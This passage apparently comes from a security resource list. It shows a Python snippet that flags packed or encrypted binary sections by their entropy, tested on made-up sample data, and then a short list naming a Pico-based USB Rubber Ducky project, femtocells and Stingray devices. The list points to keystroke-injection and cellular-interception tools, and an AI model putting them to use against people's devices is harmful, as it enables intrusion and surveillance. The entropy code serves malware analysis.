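    out = []
    for name, blob in sections:
        e = shannon_entropy(blob)
        out.append((name, round(e, 3), e >= threshold))
    return out

# Constructed sample sections: text-like data, a zero-filled section, and a
# pseudo-random block standing in for a packed section (no real PE is parsed).
_rng = random.Random(1)
SAMPLE_SECTIONS = [
    (".text", b"This is ordinary program text with repeated words, words, words. " * 32),
    (".bss", b"\x00" * 2048),
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
]

if __name__ == "__main__":
    for name, e, flagged in section_entropies(SAMPLE_SECTIONS):
        print(f"{name:6} entropy={e:.3f} {'<- possibly packed/encrypted' if flagged else ''}")
```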
- USB Rubber Ducky using Raspberry Pi Pico: https://github.com/dbisu/pico-ducky
- FemtoCell
- Stingray